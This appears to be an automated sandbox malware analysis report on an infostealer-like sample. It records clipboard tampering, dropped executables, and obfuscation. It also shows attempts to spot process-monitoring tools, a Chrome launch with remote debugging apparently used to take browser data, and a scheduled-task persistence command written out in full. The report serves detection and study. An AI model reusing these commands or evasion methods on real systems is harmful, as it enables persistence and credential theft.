Source: chrome.exe, 00000003.00000002.2479384250.0000002400644000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.2471080751.0000002400C78000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/
Source: chrome.exe, 00000003.00000002.2480140227.000000240080C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/Charii3
Source: chrome.exe, 00000003.00000002.2478074584.00000024001C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2480169445.0000002400838000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2480502776.0000002400948000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/chrome/tips/
Source: chrome.exe, 00000003.00000002.2478074584.00000024001C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2480169445.0000002400838000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2480502776.0000002400948000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/chrome/tips/gs
Source: chrome.exe, 00000003.00000002.2482484881.0000002400ED0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=
Source: chrome.exe, 00000003.00000002.2479244767.00000024005E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2479011220.000000240051C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2481227381.0000002400B7C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: chrome.exe, 00000003.00000002.2479244767.00000024005E4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico$_
Source: chrome.exe, 00000003.00000002.2478940760.00000024004E8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/tools/feedback/chrome/__submit
Source: chrome.exe, 00000003.00000002.2480738587.0000002400A0C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/undo
Source: chrome.exe, 00000003.00000002.2477505295.000000240001C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/
Source: chrome.exe, 00000003.00000002.2478126449.000000240020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/oauth2/v1/userinfo
Source: chrome.exe, 00000003.00000002.2478126449.000000240020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/oauth2/v2/tokeninfo
Source: chrome.exe, 00000003.00000002.2479315595.0000002400618000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2478126449.000000240020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/oauth2/v4/token
Source: chrome.exe, 00000003.00000002.2478126449.000000240020C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2481309311.0000002400BB0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/reauth/v1beta/users/
Source: chrome.exe, 00000003.00000002.2478940760.00000024004E8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com/chrome/intelligence/assist/ranker/models/translate/2017/03/translate_ranker_
Source: chrome.exe, 00000003.00000002.2480404813.0000002400921000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/:
Source: chrome.exe, 00000003.00000002.2480404813.0000002400921000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/?feature=ytca
Source: chrome.exe, 00000003.00000002.2480404813.0000002400921000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/J
Source: chrome.exe, 00000003.00000002.2480404813.0000002400921000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.2478328632.00000024002C0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49780
Source: unknown Network traffic detected: HTTP traffic on port 49780 -> 443
Contains functionality for read data from the clipboard
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6C5F9D11 OpenClipboard,GlobalAlloc,GlobalLock,strcpy,GlobalUnlock,EmptyClipboard,SetClipboardData,CloseClipboard, 9_2_6C5F9D11
Contains functionality to modify clipboard data
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6C5F9D11 OpenClipboard,GlobalAlloc,GlobalLock,strcpy,GlobalUnlock,EmptyClipboard,SetClipboardData,CloseClipboard, 9_2_6C5F9D11
Contains functionality to read the clipboard data
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6C5F9E27 GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard, 9_2_6C5F9E27

System Summary
barindex
Drops large PE files
Source: C:\Users\user\Desktop\file.exe File dump: service123.exe.0.dr 314617856 Jump to dropped file
PE file contains section with special chars
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .rsrc
Source: file.exe Static PE information: section name: .idata
Source: file.exe Static PE information: section name:
Abnormal high CPU Usage
Source: C:\Users\user\Desktop\file.exe Process Stats: CPU usage > 49%
Detected potential crypto function
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_002D51B0 9_2_002D51B0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_002D3E20 9_2_002D3E20
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6C622CCE 9_2_6C622CCE
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6C5ECD00 9_2_6C5ECD00
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6C5EEE50 9_2_6C5EEE50
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6C5F0FC0 9_2_6C5F0FC0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6C630AC0 9_2_6C630AC0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6C5F44F0 9_2_6C5F44F0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6C6246E0 9_2_6C6246E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6C6187C0 9_2_6C6187C0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6C6207D0 9_2_6C6207D0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6C630060 9_2_6C630060
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6C622090 9_2_6C622090
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6C602210 9_2_6C602210
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6C612360 9_2_6C612360
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6C63DC70 9_2_6C63DC70
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6C6B3D00 9_2_6C6B3D00
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6C6198F0 9_2_6C6198F0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6C5F5880 9_2_6C5F5880
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6C627A20 9_2_6C627A20
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6C62DBEE 9_2_6C62DBEE
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6C62140E 9_2_6C62140E
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6C631510 9_2_6C631510
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6C62F610 9_2_6C62F610
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6C60F760 9_2_6C60F760
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6C5E3000 9_2_6C5E3000
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6C5F70C0 9_2_6C5F70C0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6C6A5180 9_2_6C6A5180
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\service123.exe 05466AC3A1F09726E552D0CBF3BAC625A7EB7944CEDF812F60B066DCBD74AFB1
Found potential string decryption / allocating functions
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: String function: 6C6B3B20 appears 38 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: String function: 6C6AADB0 appears 49 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: String function: 6C6B3820 appears 31 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: String function: 6C6B36E0 appears 45 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: String function: 6C6B5980 appears 83 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: String function: 6C6B3560 appears 42 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: String function: 6C6B5A70 appears 75 times
One or more processes crash
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2828 -s 1296
Uses 32bit PE files
Source: file.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: file.exe Static PE information: Section: gdiujpci ZLIB complexity 0.994316652913318
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@18/7@10/4
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\DGdQGkLyQR Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Mutant created: \Sessions\1\BaseNamedObjects\JStVXPURjEhqLJtWBhCN
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2828
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5448:120:WilError_03
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\service123.exe Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Users\user\Desktop\file.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\file.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\file.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\file.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: chrome.exe, 00000003.00000002.2479777159.0000002400715000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE psl_extensions (domain VARCHAR NOT NULL, UNIQUE (domain));
Source: file.exe ReversingLabs: Detection: 36%
Source: unknown Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2392 --field-trial-handle=2316,i,660778272520788295,10458363181096637325,262144 /prefetch:8
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\service123.exe "C:\Users\user\AppData\Local\Temp\service123.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2828 -s 1296
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\service123.exe C:\Users\user\AppData\Local\Temp\/service123.exe
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\service123.exe C:\Users\user\AppData\Local\Temp\/service123.exe
Source: C:\Users\user\Desktop\file.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default" Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2392 --field-trial-handle=2316,i,660778272520788295,10458363181096637325,262144 /prefetch:8 Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: unmycipohmxnjqoesrey.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: unmycipohmxnjqoesrey.dll Jump to behavior
Source: file.exe Static file information: File size 4385280 > 1048576
Source: file.exe Static PE information: Raw size of is bigger than: 0x100000 < 0x277800
Source: file.exe Static PE information: Raw size of gdiujpci is bigger than: 0x100000 < 0x1b3800
Contains functionality to dynamically determine API calls
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_002D8230 LoadLibraryA,GetProcAddress,FreeLibrary,GetLastError, 9_2_002D8230
Entry point lies outside standard sections
Source: initial sample Static PE information: section where entry point is pointing to: .taggant
PE file contains an invalid checksum
Source: file.exe Static PE information: real checksum: 0x436c61 should be: 0x434ca1
PE file contains sections with non-standard names
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .rsrc
Source: file.exe Static PE information: section name: .idata
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: gdiujpci
Source: file.exe Static PE information: section name: zdypqqxr
Source: file.exe Static PE information: section name: .taggant
Source: service123.exe.0.dr Static PE information: section name: .eh_fram
Source: unmYCIPOHmXNjqOesrEy.dll.0.dr Static PE information: section name: .eh_fram
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_01A29923 push eax; retn 0073h 0_3_01A2993A
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_002DA499 push es; iretd 9_2_002DA694
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6C690C30 push eax; mov dword ptr [esp], edi 9_2_6C690DAA
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6C65ED10 push eax; mov dword ptr [esp], ebx 9_2_6C65EE33
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6C628E7A push edx; mov dword ptr [esp], ebx 9_2_6C628E8E
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6C634E31 push eax; mov dword ptr [esp], ebx 9_2_6C634E45
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6C62A947 push eax; mov dword ptr [esp], ebx 9_2_6C62A95B
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6C630AA2 push eax; mov dword ptr [esp], ebx 9_2_6C630AB6
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6C648AA0 push eax; mov dword ptr [esp], ebx 9_2_6C64909F
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6C632AAC push edx; mov dword ptr [esp], ebx 9_2_6C632AC0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6C65EAB0 push eax; mov dword ptr [esp], ebx 9_2_6C65EBDB
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6C662BF0 push eax; mov dword ptr [esp], ebx 9_2_6C662F24
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6C662BF0 push edx; mov dword ptr [esp], ebx 9_2_6C662F43
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6C648460 push eax; mov dword ptr [esp], ebx 9_2_6C648A5F
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6C628435 push edx; mov dword ptr [esp], ebx 9_2_6C628449
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6C6204E0 push eax; mov dword ptr [esp], ebx 9_2_6C6206DA
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6C62048B push eax; mov dword ptr [esp], ebx 9_2_6C6204A1
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6C601CFA push eax; mov dword ptr [esp], ebx 9_2_6C6B6622
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6C601CFA push eax; mov dword ptr [esp], ebx 9_2_6C6B6622
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6C62A5A7 push eax; mov dword ptr [esp], ebx 9_2_6C62A5BB
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6C662620 push eax; mov dword ptr [esp], ebx 9_2_6C662954
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6C662620 push edx; mov dword ptr [esp], ebx 9_2_6C662973
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6C6266F3 push edx; mov dword ptr [esp], ebx 9_2_6C626707
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6C6206FD push eax; mov dword ptr [esp], ebx 9_2_6C6206DA
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6C6206A2 push eax; mov dword ptr [esp], ebx 9_2_6C6206DA
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6C6386A1 push 890005EAh; ret 9_2_6C6386A9
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6C6206A6 push eax; mov dword ptr [esp], ebx 9_2_6C6206DA
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6C6706B0 push eax; mov dword ptr [esp], ebx 9_2_6C670A4F
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6C62A777 push eax; mov dword ptr [esp], ebx 9_2_6C62A78B
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6C62070E push eax; mov dword ptr [esp], ebx 9_2_6C6206DA
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6C630042 push eax; mov dword ptr [esp], ebx 9_2_6C630056
Source: file.exe Static PE information: section name: gdiujpci entropy: 7.954839612403231
Drops PE files
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\unmYCIPOHmXNjqOesrEy.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\service123.exe Jump to dropped file

Boot Survival
barindex
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Uses schtasks.exe or at.exe to add and modify task schedules
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
